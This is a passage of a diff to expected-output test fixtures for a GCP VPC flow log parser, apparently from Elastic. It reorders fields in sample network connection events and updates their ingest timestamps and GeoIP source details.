"{\"insertId\":\"1gq7q7afe373es\",\"jsonPayload\":{\"bytes_sent\":\"76976\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65276},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220621567Z\",\"packets_sent\":\"749\",\"reporter\":\"DEST\",\"rtt_msec\":\"156\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.760349279Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:00.760349279Z", - "end": "2019-06-14T03:49:56.220621567Z", - "id": "1gq7q7afe373es", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.139.99.242", "port": 9200, @@ -22226,13 +23310,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 65319, @@ -22240,6 +23327,16 @@ "ip": "67.43.156.13", "packets": 747 }, + "event": { + "ingested": "2021-12-14T14:43:27.415289144Z", + "original": "{\"insertId\":\"1gq7q7afe373fu\",\"jsonPayload\":{\"bytes_sent\":\"72967\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65319},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220617595Z\",\"packets_sent\":\"747\",\"reporter\":\"DEST\",\"rtt_msec\":\"62\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.740597880Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "kind": "event", + "start": "2019-06-14T03:39:59.740597880Z", + "end": "2019-06-14T03:49:56.220617595Z", + "id": "1gq7q7afe373fu", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -22251,7 +23348,9 @@ "iana_number": "6", "packets": 747, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:17.763Z", "ecs": { "version": "1.12.0" @@ -22259,9 +23358,12 @@ "related": { "ip": [ "67.43.156.13", - "10.139.99.242" + "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { @@ -22278,25 +23380,10 @@ "vpcflow": { "reporter": "DEST", "rtt": { - "ms": 62 + "ms": 36 } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392408100Z", - "original": "{\"insertId\":\"1gq7q7afe373fu\",\"jsonPayload\":{\"bytes_sent\":\"72967\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65319},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220617595Z\",\"packets_sent\":\"747\",\"reporter\":\"DEST\",\"rtt_msec\":\"62\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.740597880Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", - "kind": "event", - "start": "2019-06-14T03:39:59.740597880Z", - "end": "2019-06-14T03:49:56.220617595Z", - "id": "1gq7q7afe373fu", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.87.40.76", "port": 5601, @@ -22305,11 +23392,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 50364, @@ -22317,6 +23409,16 @@ "ip": "67.43.156.13", "packets": 9 }, + "event": { + "ingested": "2021-12-14T14:43:27.415289534Z", + "original": "{\"insertId\":\"1gq7q7afe373f2\",\"jsonPayload\":{\"bytes_sent\":\"1464\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":50364},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:08.797851544Z\",\"packets_sent\":\"9\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:40:08.412738626Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:08.412738626Z", + "end": "2019-06-14T03:40:08.797851544Z", + "id": "1gq7q7afe373f2", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -22328,19 +23430,30 @@ "iana_number": "6", "packets": 9, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:17.763Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "67.43.156.13", - "10.87.40.76" + "10.87.40.76", + "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "destination": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 36 + } + }, + "source": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", @@ -22351,36 +23464,20 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } - }, - "vpcflow": { - "reporter": "DEST", - "rtt": { - "ms": 36 - } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392412600Z", - "original": "{\"insertId\":\"1gq7q7afe373f2\",\"jsonPayload\":{\"bytes_sent\":\"1464\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":50364},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:08.797851544Z\",\"packets_sent\":\"9\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:40:08.412738626Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:08.412738626Z", - "end": "2019-06-14T03:40:08.797851544Z", - "id": "1gq7q7afe373f2", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 50364, @@ -22394,6 +23491,16 @@ "domain": "kibana", "ip": "10.87.40.76" }, + "event": { + "ingested": "2021-12-14T14:43:27.415290090Z", + "original": "{\"insertId\":\"1gq7q7afe373ee\",\"jsonPayload\":{\"bytes_sent\":\"1784\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":50364,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:40:08.797851544Z\",\"packets_sent\":\"8\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.412738626Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:08.412738626Z", + "end": "2019-06-14T03:40:08.797851544Z", + "id": "1gq7q7afe373ee", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -22405,25 +23512,24 @@ "iana_number": "6", "packets": 8, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:17.763Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "10.87.40.76", - "67.43.156.13" + "67.43.156.13", + "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 36 - } - }, - "source": { + "destination": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", @@ -22434,23 +23540,14 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } + }, + "vpcflow": { + "reporter": "DEST", + "rtt": { + "ms": 36 + } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392418300Z", - "original": "{\"insertId\":\"1gq7q7afe373ee\",\"jsonPayload\":{\"bytes_sent\":\"1784\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":50364,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:40:08.797851544Z\",\"packets_sent\":\"8\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.412738626Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:08.412738626Z", - "end": "2019-06-14T03:40:08.797851544Z", - "id": "1gq7q7afe373ee", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.87.40.76", "port": 5601, @@ -22459,11 +23556,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33126, @@ -22471,6 +23573,16 @@ "ip": "67.43.156.13", "packets": 7 }, + "event": { + "ingested": "2021-12-14T14:43:27.415290583Z", + "original": "{\"insertId\":\"1gq7q7afe373ey\",\"jsonPayload\":{\"bytes_sent\":\"1457\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33126},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:44:50.919744677Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:44:50.809605761Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "kind": "event", + "start": "2019-06-14T03:44:50.809605761Z", + "end": "2019-06-14T03:44:50.919744677Z", + "id": "1gq7q7afe373ey", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -22482,7 +23594,9 @@ "iana_number": "6", "packets": 7, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:17.763Z", "ecs": { "version": "1.12.0" @@ -22490,9 +23604,12 @@ "related": { "ip": [ "67.43.156.13", - "10.87.40.76" + "10.139.99.242" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { @@ -22509,25 +23626,10 @@ "vpcflow": { "reporter": "DEST", "rtt": { - "ms": 36 + "ms": 96 } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392422600Z", - "original": "{\"insertId\":\"1gq7q7afe373ey\",\"jsonPayload\":{\"bytes_sent\":\"1457\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33126},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:44:50.919744677Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:44:50.809605761Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", - "kind": "event", - "start": "2019-06-14T03:44:50.809605761Z", - "end": "2019-06-14T03:44:50.919744677Z", - "id": "1gq7q7afe373ey", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.139.99.242", "port": 9200, @@ -22536,13 +23638,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 65318, @@ -22550,6 +23655,16 @@ "ip": "67.43.156.13", "packets": 747 }, + "event": { + "ingested": "2021-12-14T14:43:27.415291269Z", + "original": "{\"insertId\":\"1gq7q7afe373e7\",\"jsonPayload\":{\"bytes_sent\":\"73215\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65318},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220599950Z\",\"packets_sent\":\"747\",\"reporter\":\"DEST\",\"rtt_msec\":\"96\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.760345858Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:00.760345858Z", + "end": "2019-06-14T03:49:56.220599950Z", + "id": "1gq7q7afe373e7", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -22561,19 +23676,30 @@ "iana_number": "6", "packets": 747, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:17.763Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "67.43.156.13", - "10.139.99.242" + "10.87.40.76", + "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "destination": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 36 + } + }, + "source": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", @@ -22584,36 +23710,20 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } - }, - "vpcflow": { - "reporter": "DEST", - "rtt": { - "ms": 96 - } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392426800Z", - "original": "{\"insertId\":\"1gq7q7afe373e7\",\"jsonPayload\":{\"bytes_sent\":\"73215\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65318},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220599950Z\",\"packets_sent\":\"747\",\"reporter\":\"DEST\",\"rtt_msec\":\"96\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.760345858Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:00.760345858Z", - "end": "2019-06-14T03:49:56.220599950Z", - "id": "1gq7q7afe373e7", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 53096, @@ -22627,6 +23737,16 @@ "domain": "kibana", "ip": "10.87.40.76" }, + "event": { + "ingested": "2021-12-14T14:43:27.415291668Z", + "original": "{\"insertId\":\"1gq7q7afe373f8\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":53096,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:43:20.813699795Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:43:20.700692281Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "kind": "event", + "start": "2019-06-14T03:43:20.700692281Z", + "end": "2019-06-14T03:43:20.813699795Z", + "id": "1gq7q7afe373f8", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -22638,46 +23758,6 @@ "iana_number": "6", "packets": 7, "direction": "outbound" - }, - "@timestamp": "2019-06-14T03:50:17.763Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.87.40.76", - "67.43.156.13" - ] - }, - "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 36 - } - }, - "source": { - "vpc": { - "project_id": "my-sample-project", - "subnetwork_name": "default", - "vpc_name": "default" - }, - "instance": { - "region": "us-east1", - "project_id": "my-sample-project", - "zone": "us-east1-b" - } - } - }, - "event": { - "ingested": "2021-12-09T13:37:46.392430200Z", - "original": "{\"insertId\":\"1gq7q7afe373f8\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":53096,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:43:20.813699795Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:43:20.700692281Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", - "kind": "event", - "start": "2019-06-14T03:43:20.700692281Z", - "end": "2019-06-14T03:43:20.813699795Z", - "id": "1gq7q7afe373f8", - "category": "network", - "type": "connection" } }, { @@ -22692,11 +23772,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -22768,7 +23853,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392434600Z", + "ingested": "2021-12-14T14:43:27.415292058Z", "original": "{\"insertId\":\"1gq7q7afe373ec\",\"jsonPayload\":{\"bytes_sent\":\"176465\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33570,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821302149Z\",\"packets_sent\":\"65\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466779642Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.466779642Z", @@ -22779,41 +23864,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "geo": { - "continent_name": "America", - "country_name": "usa" - }, - "as": { - "number": 15169 - }, - "address": "67.43.156.13", - "port": 33126, - "ip": "67.43.156.13" - }, - "source": { - "address": "10.87.40.76", - "port": 5601, - "bytes": 1776, - "packets": 7, - "domain": "kibana", - "ip": "10.87.40.76" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:WVHhCd41Iy4u55Nq5yD2UbPpH/M=", - "bytes": 1776, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 7, - "direction": "outbound" - }, "@timestamp": "2019-06-14T03:50:17.763Z", "ecs": { "version": "1.12.0" @@ -22824,6 +23874,9 @@ "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", @@ -22844,8 +23897,33 @@ } } }, + "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 33126, + "ip": 